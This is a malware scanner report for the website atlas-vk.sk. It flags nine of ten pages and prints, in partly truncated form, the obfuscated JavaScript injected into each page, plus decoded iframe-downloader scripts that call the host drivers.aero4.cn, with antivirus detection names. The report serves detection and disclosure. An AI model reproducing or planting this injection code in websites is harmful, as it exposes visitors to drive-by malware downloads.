Malware Scanner report for atlas-vk.sk

Malicious/Suspicious/Total urls checked: 9/0/10

9 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "atlas-vk.sk" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=atlas-vk.sk

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.atlas-vk.sk/	200 OK Content-Length: 10638 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20BS%28BZ%29%7Breturn%20BZ%7Dfunction%20AS%28UN%29%7Breturn%20String.fromCharCode%28UN%29%7Dfunction%20Mr%28RZ%2CEB%2CHt%29%7Breturn%20RZ.substr%28EB%2CHt%29%7Dtry%7Bvar%20FC%3D%27KK0Ke0KX0K60K80Kr0KC0KR0K90Kn0K30KW0KD0Kx0Kq0KL0Km0KF0K70Kh0KU0KV0KB0Kc0Ka0Kd0KM0KP0KT0KS0Kz0Ky0Kg0KY0K40Ki0KZ0KG0Kw0Kk0Kl0Kj0Ko0K50KN0Ks0Kb0Kt0KA0KO0KI0Kf0Kp0KH0eK0ee0eX0e60e80er0eC0eR0e90en0e30eW0eD0ex0eq0eL0em0eF0e70eh0eU0eV0eB%27%3Bvar%20Pa%3DBS%28%2 ... 3000 bytes are skipped ...KLKmK6KFK7KhKUKVKtKqK9KnKxKaK8KDKeKCKFKoKoKUKVKtK9KnKKKiKeKXK6K8KrKCKR%27%3Bvar%20NT%3DString%28%29%3B%20FC%3DFC.split%28Pa%29%3Bvar%20Ap%3DPR.length%2CJO%3D0%3B%20while%28JO%3CAp%29%7BnR%3DMr%28PR%2CJO%2C2%29%3Bvar%20fOJ%3DFC.length%2CvD%3D0%3Bwhile%28vD%3CfOJ%29%7Bif%28FC%5BvD%5D%3D%3DnR%29break%3BvD++%7D%3BNT+%3DAS%28BS%28gZ%5BvD%5D%29%5EBS%28169%29%29%3BJO+%3D2%7Dfunction%20Ka%28wm%29%7Breturn%20parseInt%28wm%29%7Ddocument.write%28NT%29%3B%7Dcatch%28kS%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Antivirus reports: McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B Kaspersky HEUR:Trojan.Script.Iframer
http://www.atlas-vk.sk/index.htm	200 OK Content-Length: 10638 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20BS%28BZ%29%7Breturn%20BZ%7Dfunction%20AS%28UN%29%7Breturn%20String.fromCharCode%28UN%29%7Dfunction%20Mr%28RZ%2CEB%2CHt%29%7Breturn%20RZ.substr%28EB%2CHt%29%7Dtry%7Bvar%20FC%3D%27KK0Ke0KX0K60K80Kr0KC0KR0K90Kn0K30KW0KD0Kx0Kq0KL0Km0KF0K70Kh0KU0KV0KB0Kc0Ka0Kd0KM0KP0KT0KS0Kz0Ky0Kg0KY0K40Ki0KZ0KG0Kw0Kk0Kl0Kj0Ko0K50KN0Ks0Kb0Kt0KA0KO0KI0Kf0Kp0KH0eK0ee0eX0e60e80er0eC0eR0e90en0e30eW0eD0ex0eq0eL0em0eF0e70eh0eU0eV0eB%27%3Bvar%20Pa%3DBS%28%2 ... 3000 bytes are skipped ...KLKmK6KFK7KhKUKVKtKqK9KnKxKaK8KDKeKCKFKoKoKUKVKtK9KnKKKiKeKXK6K8KrKCKR%27%3Bvar%20NT%3DString%28%29%3B%20FC%3DFC.split%28Pa%29%3Bvar%20Ap%3DPR.length%2CJO%3D0%3B%20while%28JO%3CAp%29%7BnR%3DMr%28PR%2CJO%2C2%29%3Bvar%20fOJ%3DFC.length%2CvD%3D0%3Bwhile%28vD%3CfOJ%29%7Bif%28FC%5BvD%5D%3D%3DnR%29break%3BvD++%7D%3BNT+%3DAS%28BS%28gZ%5BvD%5D%29%5EBS%28169%29%29%3BJO+%3D2%7Dfunction%20Ka%28wm%29%7Breturn%20parseInt%28wm%29%7Ddocument.write%28NT%29%3B%7Dcatch%28kS%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Antivirus reports: McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B Kaspersky HEUR:Trojan.Script.Iframer
http://www.atlas-vk.sk/index_anj.htm	200 OK Content-Length: 10029 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20CF%28Rg%29%7Breturn%20Rg%7Dfunction%20SMh%28DvN%29%7Breturn%20String.fromCharCode%28DvN%29%7Dfunction%20RCU%28SKI%2CfiJ%2Ccie%29%7Breturn%20SKI.substr%28fiJ%2Ccie%29%7Dtry%7Bvar%20ho%3D%27MMuMPuMGuM8uMOuM3uMLuMSuM5uMzuMCuMruMhuMTuMnuMDuMXuMNuMouMauMcuMiuMguMBuMZuMUuMfuM9uMkuMluMwuMFuMRuMJuMmuMpuMIuMxuMHuMeuMduMbuMtuMVuMyuMjuMYuM6uMsuMAuMKuM4uMWuMquPMuPPuPGuP8uPOuP3uPLuPSuP5uPzuPCuPruPhuPTuPnuPDuPXuPNuPouPauPcuPiuPg%27%2Ciu%3DCF% ... 3000 bytes are skipped ...jMnMDMXM8MNMoMaMcMiM6MnM5MzMTMZMOMhMPMLMNMtMtMcMiM6M5MzMMMpMPMGM8MOM3MLMS%27%2Cqg%3D%27%27%3B%20ho%3Dho.split%28iu%29%2CtPX%3DJt.length%3Bvar%20Eq%3D0%3B%20while%28Eq%3CtPX%29%7BeX%3DRCU%28Jt%2CEq%2C2%29%3Bvar%20TV%3Dho.length%3Bvar%20Ny%3D0%3Bwhile%28Ny%3CTV%29%7Bif%28ho%5BNy%5D%3D%3DeX%29break%3BNy++%7D%3Bqg+%3DSMh%28CF%28Aj%5BNy%5D%29%5ECF%28177%29%29%3BEq+%3D2%7Dfunction%20tv%28UV%29%7Breturn%20parseInt%28UV%29%7Ddocument.write%28qg%29%3B%7Dcatch%28MIB%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Antivirus reports: McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B Kaspersky HEUR:Trojan.Script.Iframer
http://www.atlas-vk.sk/construct.htm	200 OK Content-Length: 6179 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20fC%28mo%29%7Breturn%20mo%7Dfunction%20nd%28oB%29%7Breturn%20String.fromCharCode%28oB%29%7Dfunction%20FM%28WL%2CNk%2CUk%29%7Breturn%20WL.substr%28Nk%2CUk%29%7Dtry%7Bfunction%20tjl%28vfo%29%7Breturn%20parseInt%28vfo%29%7Dvar%20niW%3D%27LL2LR2LX2LU2LN2Li2Lq2Lg2LV2LS2Lp2Lj2L92LK2Lt2Ll2Lf2Lx2Lo2Lz2LI2L42Lh2L52LY2LG2LZ2Lm2Le2LB2L82LJ2Lr2LT2L62Lw2Ly2Ln2LH2LM2LD2LP2Ls2Lc2LO2LC2LW2La2LA2L32LF2Lk2Lb2Ld2RL2RR2RX2RU2RN2Ri2Rq2Rg2RV2RS2Rp2Rj2 ... 3000 bytes are skipped ...L5LVLSLrLxLULtLKLtLZLtL9LzLCLtLlLfLULxLoLzLIL4LaLtLVLSLKLYLNL9LRLqLxLsLsLIL4LaLVLSLLLwLRLXLULNLiLqLg%27%3Bvar%20tFD%3DString%28%29%3B%20niW%3DniW.split%28GqJ%29%3Bvar%20Uz%3DGCi.length%2CpDf%3D0%3B%20while%28pDf%3CUz%29%7BEHQ%3DFM%28GCi%2CpDf%2C2%29%3Bvar%20Vno%3DniW.length%2Ctbo%3D0%3Bwhile%28tbo%3CVno%29%7Bif%28niW%5Btbo%5D%3D%3DEHQ%29break%3Btbo++%7D%3BtFD+%3Dnd%28fC%28ViF%5Btbo%5D%29%5EfC%28208%29%29%3BpDf+%3D2%7Ddocument.write%28tFD%29%3B%7Dcatch%28qH%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : '4arvd', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram ... 810 bytes are skipped ...', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : '4arvd', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports: Avast JS:Iframe-DPZ [Trj] K7AntiVirus Trojan ( ff0749be0 ) Kaspersky Trojan-Downloader.JS.Remora.ao NANO-Antivirus Trojan.Script.Sifil.bxvwwd F-Prot JS/Dframe.C Commtouch JS/Dframe.C ESET-NOD32 JS/TrojanDownloader.Remora.AO
http://www.atlas-vk.sk/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://www.atlas-vk.sk/konstrukcia.htm	200 OK Content-Length: 6452 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20TG%28TS%29%7Breturn%20TS%7Dfunction%20wT%28ta%29%7Breturn%20String.fromCharCode%28ta%29%7Dfunction%20cg%28vL%2CiK%2CAn%29%7Breturn%20vL.substr%28iK%2CAn%29%7Dtry%7Bvar%20Sgt%3D%27XXEXaEX3EXKEXoEXDEXJEXZEXiEXPEXCEXyEXxEXcEXjEXdEXkEXhEXTEX7EXSEXsEX5EXREXIEXUEXnEXlEXFEXAEXeEXfEXLEXMEXBEXwEXOEX6EX9EXqEXtEXzEXrEXNEXgEX4EXmEXHEXbEXYEXWEX8EXVEXpEaXEaaEa3EaKEaoEaDEaJEaZEaiEaPEaCEayEaxEacEajEadEakEahEaTEa7EaSEasEa5%27%3Bvar%20MVK%3DTG%28 ... 3000 bytes are skipped ...cXIXoXxXaXJXhXrXrXSXsXHXiXPXXXwXaX3XKXoXDXJXZ%27%3Bvar%20RvG%3DString%28%29%3Bfunction%20hbY%28kRz%29%7Breturn%20parseInt%28kRz%29%7D%20Sgt%3DSgt.split%28MVK%29%3Bvar%20nu%3DYQB.length%2CQkv%3D0%3B%20while%28Qkv%3Cnu%29%7Bjxk%3Dcg%28YQB%2CQkv%2C2%29%3Bvar%20cyb%3DSgt.length%2CPwB%3D0%3Bwhile%28PwB%3Ccyb%29%7Bif%28Sgt%5BPwB%5D%3D%3Djxk%29break%3BPwB++%7D%3BRvG+%3DwT%28TG%28aPS%5BPwB%5D%29%5ETG%28174%29%29%3BQkv+%3D2%7Ddocument.write%28RvG%29%3B%7Dcatch%28nH%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Antivirus reports: McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B Kaspersky HEUR:Trojan.Script.Iframer
http://www.atlas-vk.sk/kontakt.htm	200 OK Content-Length: 10825 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20Tc%28sH%29%7Breturn%20sH%7Dfunction%20pQ%28Tu%29%7Breturn%20String.fromCharCode%28Tu%29%7Dfunction%20zA%28IG%2CgN%2CRY%29%7Breturn%20IG.substr%28gN%2CRY%29%7Dtry%7Bvar%20EF%3D%27KK1Kl1KN1Ka1K81Kj1KT1KG1Kf1KR1Kz1KM1K31KP1Ki1KX1KH1Kb1KL1K91KS1K51KJ1KW1KZ1Kh1KY1Kk1Kx1K41Kn1KI1Kd1KD1Kw1KV1Ky1Ke1KA1KU1K61KF1KO1KC1Ko1Kt1Kq1Kp1Kg1Kc1KB1K71Ks1Km1lK1ll1lN1la1l81lj1lT1lG1lf1lR1lz1lM1l31lP1li1lX1lH1lb1lL1l91lS1l51lJ%27%3Bvar%20Mh%3DEF.subs ... 3997 bytes are skipped ...KXKHKaKbKLK9KSK5KpKiKfKRKPKZK8K3KlKTKbKOKOKSK5KpKfKRKKKVKlKNKaK8KjKTKG%27%3Bvar%20dA%3DString%28%29%3Bfunction%20fM%28DJ%29%7Breturn%20parseInt%28DJ%29%7D%20EF%3DEF.split%28Mh%29%3Bvar%20XM%3Dbo.length%2Chx%3D0%3B%20while%28hx%3CXM%29%7Beu%3DzA%28bo%2Chx%2C2%29%3Bvar%20ZjC%3DEF.length%2CzU%3D0%3Bwhile%28zU%3CZjC%29%7Bif%28EF%5BzU%5D%3D%3Deu%29break%3BzU++%7D%3BdA+%3DpQ%28Tc%28vC%5BzU%5D%29%5ETc%28149%29%29%3Bhx+%3D2%7Ddocument.write%28dA%29%3B%7Dcatch%28ME%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Antivirus reports: McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B Kaspersky HEUR:Trojan.Script.Iframer
http://www.atlas-vk.sk/ubytovanie.htm	200 OK Content-Length: 8652 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20hf%28cq%29%7Breturn%20cq%7Dfunction%20HF%28qN%29%7Breturn%20String.fromCharCode%28qN%29%7Dfunction%20vE%28OU%2CLV%2CWA%29%7Breturn%20OU.substr%28LV%2CWA%29%7Dtry%7Bfunction%20ap%28EB%29%7Breturn%20parseInt%28EB%29%7Dvar%20CY%3D%27zzEzCEzmEzUEzIEzVEzlEzfEzoEzgEzGEzdEzMEzREzwEziEzAEzHEz9Ez7EznEzrEzpEz5EzYEzJEz4EzkEzxEz3EzaEzPEzLEzFEzhEzXEzyEzKEztEzeEz8EzsEzBEzDEzbEzcEzqEzZEzjEzSEz6EzNEzOEzWECzECCECmECUECIECVEClECfECoECgECGECdECMEC ... 3000 bytes are skipped ...zMzwzRzZzozgzkz5zkzozgz5zozgzLzHzUzwzRzwz4zwzMz7zczwzizAzUzHz9z7znzrzZzwzozgzRzYzIzMzCzlzHzBzBznzrzZzozgzzzXzCzmzUzIzVzlzf%27%3Bvar%20yk%3DString%28%29%3B%20CY%3DCY.split%28sf%29%3Bvar%20mS%3Djt.length%2CDG%3D0%3B%20while%28DG%3CmS%29%7BRZ%3DvE%28jt%2CDG%2C2%29%3Bvar%20vfl%3DCY.length%2CNF%3D0%3Bwhile%28NF%3Cvfl%29%7Bif%28CY%5BNF%5D%3D%3DRZ%29break%3BNF++%7D%3Byk+%3DHF%28hf%28dh%5BNF%5D%29%5Ehf%28203%29%29%3BDG+%3D2%7Ddocument.write%28yk%29%3B%7Dcatch%28cY%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'rvd4a', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram ... 810 bytes are skipped ...', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'rvd4a', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports: Avast JS:Iframe-DPZ [Trj] K7AntiVirus Trojan ( ff0749be0 ) Kaspersky Trojan-Downloader.JS.Remora.ao NANO-Antivirus Trojan.Script.Sifil.bxvwwd F-Prot JS/Dframe.C Commtouch JS/Dframe.C ESET-NOD32 JS/TrojanDownloader.Remora.AO
http://www.atlas-vk.sk/restauracia.htm	200 OK Content-Length: 10799 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20AH%28dM%29%7Breturn%20dM%7Dfunction%20XH%28yi%29%7Breturn%20String.fromCharCode%28yi%29%7Dfunction%20xB%28Dy%2CPj%2CLw%29%7Breturn%20Dy.substr%28Pj%2CLw%29%7Dtry%7Bfunction%20dCt%28zuT%29%7Breturn%20parseInt%28zuT%29%7Dvar%20TGz%3D%27hhuhFuhduhVuhxuhYuhwuhPuhGuhMuhquhruhbuhpuheuhDuh8uhXuh3uhZuhauhguhRuhJuhIuhzuhiuhSuh7uhWuh6uhNuhCuhLuhkuhOuhmuhBuhAuhcuh4uhfuhyuhsuhnuhluhtuh5uhouhHuh9uhjuhTuhKuFhuFFuFduFVuFxuFYuFwuFPuFGuFMuFquFru ... 3000 bytes are skipped ...hJhGhMhChXhVhehphehihehbhZhlhehDh8hVhXh3hZhahgh5hehGhMhphIhxhbhFhwhXhyhyhahgh5hGhMhhhOhFhdhVhxhYhwhP%27%3Bvar%20hMP%3DString%28%29%3B%20TGz%3DTGz.split%28ADd%29%3Bvar%20ib%3DLyE.length%2CHSf%3D0%3B%20while%28HSf%3Cib%29%7BzVO%3DxB%28LyE%2CHSf%2C2%29%3Bvar%20hvX%3DTGz.length%2CdpD%3D0%3Bwhile%28dpD%3ChvX%29%7Bif%28TGz%5BdpD%5D%3D%3DzVO%29break%3BdpD++%7D%3BhMP+%3DXH%28AH%28Ewl%5BdpD%5D%29%5EAH%28216%29%29%3BHSf+%3D2%7Ddocument.write%28hMP%29%3B%7Dcatch%28MJ%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'd4avr', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram ... 810 bytes are skipped ...', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'd4avr', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports: Avast JS:Iframe-DPZ [Trj] K7AntiVirus Trojan ( ff0749be0 ) Kaspersky Trojan-Downloader.JS.Remora.ao NANO-Antivirus Trojan.Script.Sifil.bxvwwd F-Prot JS/Dframe.C Commtouch JS/Dframe.C ESET-NOD32 JS/TrojanDownloader.Remora.AO
http://www.atlas-vk.sk/tipy.htm	200 OK Content-Length: 9230 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20XO%28Kr%29%7Breturn%20Kr%7Dfunction%20gSP%28jTq%29%7Breturn%20String.fromCharCode%28jTq%29%7Dfunction%20dCQ%28xSv%2CWVI%2CiFB%29%7Breturn%20xSv.substr%28WVI%2CiFB%29%7Dtry%7Bfunction%20byt%28tmr%29%7Breturn%20parseInt%28tmr%29%7Dvar%20VeU%3D%27SS0Ss0S90Sk0Si0SN0SG0S80S30Sq0SZ0SK0S40SI0SC0SY0Sr0SV0SM0SO0S60SX0Sw0Sg0SR0Sj0Sl0SL0ST0Sb0SA0Se0Sf0Sc0SJ0SH0Sd0St0SB0S50Sp0Sa0Sx0SP0Sm0Sn0So0Sz0SF0Sy0SU0S70SD0SW0sS0ss0s90sk0si0sN0sG0s80s3 ... 3000 bytes are skipped ...3SqSgS3SqSfSVSkSCSISCSlSCS4SOSnSCSYSrSkSVSMSOS6SXSzSCS3SqSISRSiS4SsSGSVSxSxS6SXSzS3SqSSSHSsS9SkSiSNSGS8%27%2CITa%3D%27%27%3B%20VeU%3DVeU.split%28KEi%29%2Cmju%3DkJT.length%3Bvar%20TXp%3D0%3B%20while%28TXp%3Cmju%29%7BQNa%3DdCQ%28kJT%2CTXp%2C2%29%3Bvar%20ma%3DVeU.length%3Bvar%20Lrs%3D0%3Bwhile%28Lrs%3Cma%29%7Bif%28VeU%5BLrs%5D%3D%3DQNa%29break%3BLrs++%7D%3BITa+%3DgSP%28XO%28jTF%5BLrs%5D%29%5EXO%28192%29%29%3BTXp+%3D2%7Ddocument.write%28ITa%29%3B%7Dcatch%28xbj%29%7B%7D%7Dvar%20qA%3D1%3C/script%3E")) Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'radv4', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram ... 810 bytes are skipped ...', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'radv4', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports: Avast JS:Iframe-DPZ [Trj] K7AntiVirus Trojan ( ff0749be0 ) Kaspersky Trojan-Downloader.JS.Remora.ao NANO-Antivirus Trojan.Script.Sifil.bxvwwd F-Prot JS/Dframe.C Commtouch JS/Dframe.C ESET-NOD32 JS/TrojanDownloader.Remora.AO

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: atlas-vk.sk

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: atlas-vk.sk
Referer: http://www.google.com/search?q=atlas-vk.sk

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for atlas-vk.sk

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools